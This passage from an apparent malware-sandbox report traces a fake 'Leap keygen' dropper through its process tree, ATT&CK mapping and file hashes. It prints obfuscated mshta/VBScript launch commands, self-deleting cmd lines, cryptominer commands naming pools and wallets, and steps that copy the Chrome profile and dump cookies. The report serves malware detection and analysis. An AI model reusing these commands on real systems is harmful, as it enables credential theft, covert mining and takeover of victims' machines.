                                                                                                                          • Modifies registry class
                                                                                                                          PID:4792
                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                        1⤵
                                                                                                                          PID:1852
                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                          1⤵
                                                                                                                            PID:1352
                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                            1⤵
                                                                                                                              PID:1276
                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                              1⤵
                                                                                                                                PID:1228
                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                1⤵
                                                                                                                                  PID:928
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:352
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:5700
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Leap_keygen_by_Lz0.zip\Leap_keygen_by_Lz0.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Leap_keygen_by_Lz0.zip\Leap_keygen_by_Lz0.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:5944
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:6036
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6088
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:4732
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:4124
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                              keygen-step-1.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6104
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                              keygen-step-5.exe
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6128
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScrIPt: ClosE( CReatEobjEct ( "wSCRipt.ShELL" ).RUN ( "cMD.exE /Q /C TYpE ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe""> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if """" == """" for %O in ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -im ""%~NXO"" -f > NUl " , 0 ) )
                                                                                                                                                4⤵
                                                                                                                                                  PID:588
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /C TYpE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if "" == "" for %O in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -im "%~NXO" -f > NUl
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4248
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe
                                                                                                                                                        Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4332
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" VbScrIPt: ClosE( CReatEobjEct ( "wSCRipt.ShELL" ).RUN ( "cMD.exE /Q /C TYpE ""C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe""> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if ""-P55kwJkreZhe20KkUTLcgvMphxFiZBR "" == """" for %O in ( ""C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe"" ) do taskkill -im ""%~NXO"" -f > NUl " , 0 ) )
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5384
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /Q /C TYpE "C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe"> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if "-P55kwJkreZhe20KkUTLcgvMphxFiZBR " == "" for %O in ( "C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe" ) do taskkill -im "%~NXO" -f > NUl
                                                                                                                                                              8⤵
                                                                                                                                                                PID:4784
                                                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                              "C:\Windows\System32\regsvr32.exe" /S .\6Oi_IN.~1 -U
                                                                                                                                                              7⤵
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                              PID:5736
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill -im "keygen-step-5.exe" -f
                                                                                                                                                            6⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:5436
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                      keygen-step-2.exe
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:6136
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\2B85.tmp.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\2B85.tmp.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:5708
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\2B85.tmp.exe"
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5124
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                                                              6⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:5144
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5652
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1
                                                                                                                                                              5⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:5784
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                          keygen-step-3.exe
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5208
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:5288
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:2528
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                            keygen-step-4.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4832
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:4420
                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                5⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5060
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5144
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\35B7.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\35B7.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:2992
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\35B7.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\35B7.tmp.exe"
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:664
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\38A6.tmp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\38A6.tmp.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:956
                                                                                                                                                                • C:\Windows\system32\msiexec.exe
                                                                                                                                                                  -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w22194@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:5904
                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                    -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w3654 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                    PID:6080
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:5008
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:5092
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                  PID:156
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:5072
                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                        PID:5840
                                                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                      xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      PID:4976
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:4980
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7fffcec34f50,0x7fffcec34f60,0x7fffcec34f70
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:5060
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2080 /prefetch:8
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4800
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1696 /prefetch:8
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:5748
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1648 /prefetch:2
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:5208
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2468 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5428
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2936 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:5000
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2928 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4808
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5664
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2076 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:5336
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5392
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4048 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:4756
                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:5836
                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9423131932429295345,14707454417268394232,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:4504
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                            PID:6028
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5056
                                                                                                                                                                                            • C:\ProgramData\6966797.exe
                                                                                                                                                                                              "C:\ProgramData\6966797.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4200
                                                                                                                                                                                            • C:\ProgramData\7403224.exe
                                                                                                                                                                                              "C:\ProgramData\7403224.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Adds Run key to start application
                                                                                                                                                                                              PID:4920
                                                                                                                                                                                              • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                                "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:2884
                                                                                                                                                                                            • C:\ProgramData\241065.exe
                                                                                                                                                                                              "C:\ProgramData\241065.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:4616
                                                                                                                                                                                              • C:\ProgramData\241065.exe
                                                                                                                                                                                                "{path}"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                PID:3300
                                                                                                                                                                                            • C:\ProgramData\1483703.exe
                                                                                                                                                                                              "C:\ProgramData\1483703.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4488
                                                                                                                                                                                            • C:\ProgramData\6850640.exe
                                                                                                                                                                                              "C:\ProgramData\6850640.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:6072
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:4260
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              PID:2520
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:6016
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:5052
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:4984

                                                                                                                                                                                    Network

                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                    Persistence

                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                    1
                                                                                                                                                                                    T1060

                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                    2
                                                                                                                                                                                    T1112

                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                    1
                                                                                                                                                                                    T1130

                                                                                                                                                                                    Credential Access

                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                    5
                                                                                                                                                                                    T1081

                                                                                                                                                                                    Discovery

                                                                                                                                                                                    Query Registry

                                                                                                                                                                                    3
                                                                                                                                                                                    T1012

                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                    4
                                                                                                                                                                                    T1082

                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                    1
                                                                                                                                                                                    T1018

                                                                                                                                                                                    Collection

                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                    5
                                                                                                                                                                                    T1005

                                                                                                                                                                                    Command and Control

                                                                                                                                                                                    Web Service

                                                                                                                                                                                    1
                                                                                                                                                                                    T1102

                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                    Downloads

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                      MD5

                                                                                                                                                                                      e3e48cd62c06f4a2bee90f982a835531

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      c512b74dc050173984f8979f1256f3d45f34f420

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      2927f193fa1c962350434e2c9d8da1a13531799bcdf7aa8557e8bef68d152adb

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      7b1c9efc44bbc9cadde345931a7fcd1c3cd9b98a53bc384783f17ade7abf49129e50bf0cb57dd3ec1b135721ea839afde7c14d920dd945a3b11852186358c41e

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                      MD5

                                                                                                                                                                                      65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                      SHA1

                                                                                                                                                                                      a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                      SHA256

                                                                                                                                                                                      862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                      SHA512

                                                                                                                                                                                      e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                      MD5

